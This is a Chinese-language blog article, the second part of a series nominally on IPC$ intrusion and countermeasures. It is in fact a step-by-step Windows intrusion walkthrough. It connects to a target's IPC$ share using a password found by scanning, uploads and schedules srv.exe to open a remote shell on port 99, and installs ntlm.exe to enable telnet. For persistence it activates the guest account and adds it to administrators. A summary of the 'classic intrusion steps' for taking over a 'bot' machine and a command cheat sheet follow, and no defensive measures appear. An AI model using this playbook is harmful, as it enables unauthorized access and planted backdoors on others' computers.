關於ipc入侵的解釋和對策（下）

上次說到建立空鏈接和刪除空鏈接，建立有效連接，這次說下面部分。

1. C:\>net use \\192.168.0.1\IPC$ "123456" /user:"admintitrator"

這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，後面一個雙引號裡的是用戶名，輸入administrators，命令即可成功完成。

2. C:\>copy srv.exe \\192.168.0.1\admin$

先複製srv.exe上去，在流光的Tools目錄下就有（這裡的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要複製到什麼地方去了）。

3. C:\>net time \\192.168.0.1

查查時間，發現127.0.0.1 的當前時間是 2018/8/10 上午 11:00，命令成功完成。

4. C:\>at \\192.168.0.1 11:05 srv.exe

用at命令啟動srv.exe吧（這裡設置的時間要比主機時間快，不然你怎麼啟動啊，呵呵！）

5. C:\>net time \\192.168.0.1

再查查到時間沒有？如果192.168.0.1的當前時間是 2018/8/10上午 11:05，那就準備開始下面的命令。

6. C:\>telnet 192.168.0.1 99

這裡會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了

7.C:\>copy ntlm.exe \\192.168.0.1\admin$

用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。

8. C:\WINNT\system32>ntlm

輸入ntlm啟動（這裡的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務！

9. Telnet 192.168.0.1，接著輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然後你想做什麼?想做什麼就做什麼吧,哈哈)

為了以防萬一,我們再把guest激活加到管理組

10. C:\>net user guest /active:yes

將對方的Guest用戶激活

11. C:\>net user guest 1234

將Guest的密碼改為1234,或者你要設定的密碼

12. C:\>net localgroup administrators guest /add

將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機).

ipc$經典入侵步驟：

1、net use \\ip\ipc$ 密碼 /user:用戶名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 時間 命令

5、入侵成功，連接你的肉雞

常用的網絡命令

net user 查看用戶列表

net user 用戶名 密碼 /add 添加用戶

net user 用戶名 密碼 更改用戶密碼

net localgroup administrators 用戶名 /add 添加用戶到管理組

net user 用戶名 /delete 刪除用戶

net user 用戶名 查看用戶的基本情況

net user 用戶名 /active:no 禁用該用戶

net user 用戶名 /active:yes 啟用該用戶

net share 查看計算機IPC$共享資源

net share 共享名 查看該共享的情況

net share 共享名=路徑 設置共享。例如 net share c$=c:

net share 共享名 /delete 刪除IPC$共享

net stop lanmanserver 關閉ipc$和默認共享依賴的服務

net use 查看IPC$連接情況

net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接

net use \\ip\ipc$ /del 刪除一個連接

net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤

net use z: /del

net time \\ip 查看遠程計算機上的時間

copy 路徑:\文件名 \\ip\共享名複製文件到已經ipc$連接的計算機上

net view ip 查看計算機上的共享資源

at 查看自己計算機上的計劃作業

at \\ip 查看遠程計算機上的計劃作業

at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業

at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業

at \\ip all /delete 刪除遠程計算機上的全部計劃作業

at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt；

說明:對於去除ntlm部分,可以不上傳srv.exe二在自己機子上建立一個和對方主機一樣帳號密碼的用戶,然後用這個用戶的身份連接對方

閱讀更多 我是陸小皓 的文章

關鍵字: 192.168 IP地址 exe